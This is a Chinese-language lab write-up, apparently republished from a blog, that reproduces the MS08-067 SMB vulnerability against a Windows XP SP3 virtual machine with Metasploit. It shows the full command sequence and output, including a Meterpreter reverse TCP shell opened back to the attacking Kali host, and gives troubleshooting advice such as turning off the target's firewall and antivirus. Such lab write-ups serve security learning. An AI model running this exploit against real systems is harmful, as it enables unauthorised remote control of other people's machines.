一、复现过程
靶机 | Windows XP Service Pack 3 | IP地址:192.168.244.133 |
攻击机 | Kali | IP地址:192.168.244.138 |
1、执行命令:msfconsole
┌──(root㉿kali)-[~/桌面]
└─# msfconsole
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v6.1.27-dev ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Save the current environment with the
save command, future console restarts will use this
environment again
2、执行命令:search ms08-067
msf6 > search ms08-067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
3、执行命令:use 0 或 use exploit/windows/smb/ms08_067_netapi
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
4、执行命令:show options
msf6 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.244.138 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
5、执行命令:show targets
msf6 exploit(windows/smb/ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
32 Windows XP SP3 Arabic (NX)
33 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
34 Windows XP SP3 Chinese - Simplified (NX)
35 Windows XP SP3 Chinese - Traditional (NX)
36 Windows XP SP3 Czech (NX)
6、执行命令:set target 34 和 set rhost 192.168.244.138
msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34
7、执行命令:set rhost 192.168.244.133
msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.244.133
rhost => 192.168.244.133
8、执行命令:show options
msf6 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.244.133 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.244.138 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
34 Windows XP SP3 Chinese - Simplified (NX)
9、执行命令:exploit
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.244.138:4444
[*] 192.168.244.133:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.244.133
[*] Meterpreter session 1 opened (192.168.244.138:4444 -> 192.168.244.133:1061 ) at 2022-10-06 20:36:00 +0800
8、执行命令:ipconfig
meterpreter > ifconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
Interface 2
============
Name : AMD PCNET Family PCI Ethernet Adapter -
Hardware MAC : 00:0c:29:31:24:dc
MTU : 1500
IPv4 Address : 192.168.244.133
IPv4 Netmask : 255.255.255.0
二、遇到的问题
msf6 exploit(window/amb/nsto_067_notapi) > exploit
[*] Started reverse TCP handler on 192.168.43.75:135
[-] 192.168.244.133:445 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (192.168.244.133:445) timed out.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.244.138:4444
[-] 192.168.244.144:445 - Exploit failed [unreachable]: Rex:: HostUnreachable The host (192.168.244.144:445) was unreachable.
[*] Exploit completed, but no session was created.
1、执行exploit命令后提示:Exploit failed [unreachable]: Rex:: HostUnreachable The host was unreachable. 或 Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (192.168.244.133:445) timed out.
出现这两种问题的原因可能有以下三个:
(1)靶机的防火墙或杀毒未关或如火绒这类的安全软件未退出。
当已经确定防火墙关闭时,要去检查安全软件是否退出,因为火绒会进行拦截。
(2)靶机和攻击机不在一个网段内,不能互相ping通。
(3)靶机的端口没有打开,即RPORT中所对应的端口没有打开。
注:优先考虑前两个原因,当前两个原因检查之后确定无误时,再去检查端口的状态。
2、执行exploit命令后提示:Exploit completed, but no session was created.
出现该问题的原因可能有以下两个:
(1)靶机版本不支持
下载Windows XP SP3 English。文章来源:https://www.toymoban.com/news/detail-419368.html
(2)未指定靶机的版本号,在执行show targets命令后,找到与自己靶机相对应版本的版本号,如Windows XP SP3 Chinese - Simplified (NX)的版本号为34,执行set target 34 为自己的靶机指定版本号。文章来源地址https://www.toymoban.com/news/detail-419368.html
到了这里,关于ms08-067漏洞的复现及所遇到的问题分析的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!